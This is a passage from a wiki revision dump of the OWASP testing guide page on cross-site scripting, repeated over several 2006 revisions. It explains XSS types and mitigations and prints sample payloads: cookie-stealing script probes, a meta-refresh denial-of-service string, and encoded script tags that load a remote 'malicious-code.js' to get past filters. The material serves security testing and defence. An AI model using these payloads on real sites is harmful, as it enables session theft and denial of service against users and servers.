'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br />
<br />
''Example 1:''<br />
<br />
Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case thinking render Cross Site Scripting useless. If this is the case, you may want to use VBScript since it is not a case sensative language.<br />
<br />
JavaScript: <script>alert(document.cookie);</script><br />
<br />
VBScript: <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
<br />
''Example 2:''<br />
<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<script src=http://www.owasp.org/malicious-code.js></script><br />
<br />
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br />
<br />
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
* Amit Klien: "DOM Based Cross Site Scripting" - http://www.securiteam.com/securityreviews/5MP080KGKW.html<br />
<br />
* Jeremiah Grossman: "Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous"" - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf<br />
<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13663Testing for Cross site scripting2006-11-24T19:32:21Z<p>TomRyan: /* Description of the Issue */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
<br />
The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.<br />
Exploiting such a hole would be very similar to the exploit of Reflected XSS vulnerabilities , except in one very important situation. <br />
<br />
An example would be, if an attacker hosts a malicious website, which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.<br />
<br />
<br />
The '''Reflected Cross-Site Scripting''' vulnerability is bar far the most common and well know type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.<br />
<br />
At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.<br />
In some cases a denial of service attack can be performed on the server by doing the Following: <br />
article.php?title=<meta%20http-equiv="refresh"%20content="0;"><br />
<br />
This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes. <br />
<br />
The '''Stored Cross Site Scripting''' vulnerability, is the most powerful kinds of XSS attacks. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities. A real life example of this would be SAMY, the XSS vulnerability found on MySpace in October of 2005.<br />
These vulnerabilities are more significant than other types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering or the web application could even be infected by a cross-site scripting virus.<br />
<br />
The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how if you posted a stored XSS script to a popular blog, newspaper or page comments section of a website, all the visitors of that page would have their internal networks scanned and logged for a particular type of vulnerability.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br />
<br />
''Example 1:''<br />
<br />
Since JavaScript is case sensitive, some people convert all characters to upper case, trying to render Cross Site Scripting useless. If this is the case, you may want to use VBScript.<br />
<br />
JavaScript: <script>alert(document.cookie);</script><br />
<br />
VBScript: <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
<br />
''Example 2:''<br />
<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<script src=http://www.owasp.org/malicious-code.js></script><br />
<br />
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br />
<br />
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
* Amit Klien: "DOM Based Cross Site Scripting" - http://www.securiteam.com/securityreviews/5MP080KGKW.html<br />
<br />
* Jeremiah Grossman: "Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous"" - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf<br />
<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13662Testing for Cross site scripting2006-11-24T19:14:31Z<p>TomRyan: /* References */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br />
<br />
''Example 1:''<br />
<br />
Since JavaScript is case sensitive, some people convert all characters to upper case, trying to render Cross Site Scripting useless. If this is the case, you may want to use VBScript.<br />
<br />
JavaScript: <script>alert(document.cookie);</script><br />
<br />
VBScript: <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
<br />
''Example 2:''<br />
<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<script src=http://www.owasp.org/malicious-code.js></script><br />
<br />
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br />
<br />
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
* Amit Klien: "DOM Based Cross Site Scripting" - http://www.securiteam.com/securityreviews/5MP080KGKW.html<br />
<br />
* Jeremiah Grossman: "Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous"" - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf<br />
<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13661Testing for Cross site scripting2006-11-24T19:13:50Z<p>TomRyan: /* References */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br />
<br />
''Example 1:''<br />
<br />
Since JavaScript is case sensitive, some people convert all characters to upper case, trying to render Cross Site Scripting useless. If this is the case, you may want to use VBScript.<br />
<br />
JavaScript: <script>alert(document.cookie);</script><br />
<br />
VBScript: <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
<br />
''Example 2:''<br />
<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<script src=http://www.owasp.org/malicious-code.js></script><br />
<br />
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br />
<br />
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
